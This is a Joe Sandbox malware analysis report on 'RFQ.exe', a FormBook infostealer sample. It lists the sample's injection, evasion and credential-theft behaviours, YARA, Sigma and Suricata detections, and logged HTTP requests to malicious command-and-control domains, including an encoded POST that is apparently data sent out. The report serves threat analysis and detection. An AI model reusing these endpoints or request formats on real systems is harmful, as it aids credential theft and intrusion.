Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ.exe

Overview

General Information

Sample name:RFQ.exe
Analysis ID:1551421
MD5:85496e3bd4f547ed3ecb4bba94401773
SHA1:a59428a86cc0e1b04e05444a66a862dc872f24d1
SHA256:ca6e99cb086dcbdeaa2e6dcefd08a5907eb2f6b0cee11da6aef68818bbdaa72b
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • RFQ.exe (PID: 6588 cmdline: "C:\Users\user\Desktop\RFQ.exe" MD5: 85496E3BD4F547ED3ECB4BBA94401773)
    • svchost.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\RFQ.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • rNgGAKxrFRkFYx.exe (PID: 5340 cmdline: "C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • net.exe (PID: 7600 cmdline: "C:\Windows\SysWOW64\net.exe" MD5: 31890A7DE89936F922D44D677F681A7F)
          • rNgGAKxrFRkFYx.exe (PID: 3872 cmdline: "C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7812 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.3128924724.00000000034F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.1512156269.0000000009040000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.3131106553.0000000004C10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.1506663824.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000B.00000002.3129083519.0000000003650000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              7.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RFQ.exe", CommandLine: "C:\Users\user\Desktop\RFQ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ.exe", ParentImage: C:\Users\user\Desktop\RFQ.exe, ParentProcessId: 6588, ParentProcessName: RFQ.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ.exe", ProcessId: 7324, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\RFQ.exe", CommandLine: "C:\Users\user\Desktop\RFQ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ.exe", ParentImage: C:\Users\user\Desktop\RFQ.exe, ParentProcessId: 6588, ParentProcessName: RFQ.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ.exe", ProcessId: 7324, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-07T17:57:24.228610+010020229301A Network Trojan was detected4.245.163.56443192.168.2.749730TCP
                2024-11-07T17:58:03.692339+010020229301A Network Trojan was detected172.202.163.200443192.168.2.749841TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.4nk.education/gnvu/?7j=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FgkX779Cut1JrjhVNutQKYieetaE9VDmnk+XmhNaaOMMHcA19omccG+Ez&UvgPX=o0HdzhbpI6gxAvira URL Cloud: Label: malware
                Source: http://www.4nk.education/gnvu/Avira URL Cloud: Label: malware
                Source: http://www.corpseflowerwatch.org/yjfe/?7j=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZq285UIefAyWvRUTG1EMSSL8yxTXDHgut2ZldiYl/24i9u+qUtajOfEi&UvgPX=o0HdzhbpI6gxAvira URL Cloud: Label: malware
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3128924724.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1512156269.0000000009040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3131106553.0000000004C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1506663824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3129083519.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1507308924.00000000061A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3121215291.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3129016508.0000000005600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: RFQ.exeJoe Sandbox ML: detected
                Source: RFQ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000007.00000003.1469963468.000000000303B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469615717.000000000301A000.00000004.00000020.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 00000009.00000002.3127273344.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rNgGAKxrFRkFYx.exe, 00000009.00000000.1356331320.0000000000A5E000.00000002.00000001.01000000.00000005.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3128393871.0000000000A5E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000001.00000003.1282585715.0000000004830000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000001.00000003.1280437204.0000000004690000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1329249007.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1327461526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1506943681.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1506943681.0000000003600000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3129632807.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1509162066.0000000003707000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3129632807.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1506988926.0000000003554000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RFQ.exe, 00000001.00000003.1282585715.0000000004830000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000001.00000003.1280437204.0000000004690000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1329249007.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1327461526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1506943681.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1506943681.0000000003600000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 0000000B.00000002.3129632807.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1509162066.0000000003707000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3129632807.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1506988926.0000000003554000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: net.exe, 0000000B.00000002.3130867153.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.3124155350.0000000003302000.00000004.00000020.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000000.1576072994.00000000027DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1814266241.000000001418C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: net.exe, 0000000B.00000002.3130867153.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.3124155350.0000000003302000.00000004.00000020.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000000.1576072994.00000000027DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1814266241.000000001418C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000007.00000003.1469963468.000000000303B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469615717.000000000301A000.00000004.00000020.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 00000009.00000002.3127273344.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00452492
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00442886
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_004788BD
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,1_2_004339B6
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,1_2_0045CAFA
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00431A86
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,1_2_0044BD27
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0045DE8F FindFirstFileW,FindClose,1_2_0045DE8F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_0044BF8B
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030BC820 FindFirstFileW,FindNextFileW,FindClose,11_2_030BC820
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then xor eax, eax11_2_030A9D30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then mov ebx, 00000004h11_2_037404E8
                Source: Joe Sandbox ViewIP Address: 128.65.195.180 128.65.195.180
                Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.7:49730
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49841
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004422FE InternetQueryDataAvailable,InternetReadFile,1_2_004422FE
                Source: global trafficHTTP traffic detected: GET /yjfe/?7j=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZq285UIefAyWvRUTG1EMSSL8yxTXDHgut2ZldiYl/24i9u+qUtajOfEi&UvgPX=o0HdzhbpI6gx HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.corpseflowerwatch.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gnvu/?7j=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FgkX779Cut1JrjhVNutQKYieetaE9VDmnk+XmhNaaOMMHcA19omccG+Ez&UvgPX=o0HdzhbpI6gx HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.4nk.educationUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ym43/?UvgPX=o0HdzhbpI6gx&7j=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQrtCTIFT6dG/tSbtJaoqKbhoy9A6auA9JhwvUMdjGZYE6oZ+fUFh6Re5 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.migraine-massages.proUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /d26j/?7j=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN2l5ObUVyEmhL88sORBUDBhEqT85THbs6ZR8PHSXuaXUURr4h8daA5RZo&UvgPX=o0HdzhbpI6gx HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.vnxoso88.artUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /afcr/?7j=pxUnB3/JQIgHT0Xru4WA6nCBQFxpXJgMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8BBfqyAxJMs0BkbyFlX94FNsmynKB1TNzikOc40xRpv+r7CBu5ZxKJnGu&UvgPX=o0HdzhbpI6gx HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.pluribiz.lifeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1iqa/?7j=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQgVC25Yrin2Sqkv5Fwdk+dvafD+ucZYRStKeuK1fTd52HaDhfGqTyDFD4&UvgPX=o0HdzhbpI6gx HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kdtzhb.topUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /293d/?7j=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGQY4I1bDlFW6+Qsk+eyldD4LupDRErgy15HSDrpN9gAoL/hEh+9gUTgMo&UvgPX=o0HdzhbpI6gx HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.evoo.websiteUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /vdvc/?7j=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRfNZBZZEaN8IgdCZSECanEbYOAZ+JnzF5T5/sjPpe9MQhZicEiQ4HPQfz&UvgPX=o0HdzhbpI6gx HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.astorg-group.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0m8a/?UvgPX=o0HdzhbpI6gx&7j=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo4fbiPNZTItUz1VN35oCbCkoE872J7CJYymsP5Px3u6hB+1hbmngRsUR HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.fiqsth.vipUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ezyn/?7j=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKN8+Alsd/uAlfqbny7J4c2YDLjDocbldGRQwWRw5cBSMls9XvUBQui7N&UvgPX=o0HdzhbpI6gx HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.bio-thymus.comUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.corpseflowerwatch.org
                Source: global trafficDNS traffic detected: DNS query: www.4nk.education
                Source: global trafficDNS traffic detected: DNS query: www.migraine-massages.pro
                Source: global trafficDNS traffic detected: DNS query: www.vnxoso88.art
                Source: global trafficDNS traffic detected: DNS query: www.pluribiz.life
                Source: global trafficDNS traffic detected: DNS query: www.kdtzhb.top
                Source: global trafficDNS traffic detected: DNS query: www.evoo.website
                Source: global trafficDNS traffic detected: DNS query: www.astorg-group.info
                Source: global trafficDNS traffic detected: DNS query: www.fiqsth.vip
                Source: global trafficDNS traffic detected: DNS query: www.bio-thymus.com
                Source: global trafficDNS traffic detected: DNS query: www.wukong.college
                Source: unknownHTTP traffic detected: POST /gnvu/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencodedContent-Length: 215Cache-Control: max-age=0Connection: closeHost: www.4nk.educationOrigin: http://www.4nk.educationReferer: http://www.4nk.education/gnvu/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36Data Raw: 37 6a 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 62 75 37 53 42 4d 30 4a 54 37 32 62 56 78 47 36 39 37 31 46 2b 2f 4b 6d 62 59 2f 68 64 30 48 4b 37 73 53 6b 76 34 53 34 61 43 4c 48 30 5a 68 74 7a 6a 46 74 43 7a 4f 6c 72 57 68 71 42 73 76 41 53 31 46 4f 77 41 51 6f 73 57 37 61 37 49 47 35 6b 79 4a 53 39 48 55 74 6f 64 77 39 56 6a 50 51 68 2f 73 42 51 54 61 2b 37 50 2b 47 71 2f 76 39 45 75 77 68 63 47 64 4a 68 6b 49 63 4d 59 74 36 75 6e 30 79 37 57 58 45 6f 34 66 51 68 4f 44 56 54 51 73 75 54 46 4f 57 49 49 61 53 77 4e 6f 56 42 4e 62 42 77 6a 74 65 42 53 79 44 2b 72 4e 4d 62 36 4b 42 4d 57 62 45 35 2f 79 39 46 4c 55 57 38 46 62 32 38 77 3d 3d Data Ascii: 7j=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTFOWIIaSwNoVBNbBwjteBSyD+rNMb6KBMWbE5/y9FLUW8Fb28w==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 07 Nov 2024 16:58:28 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 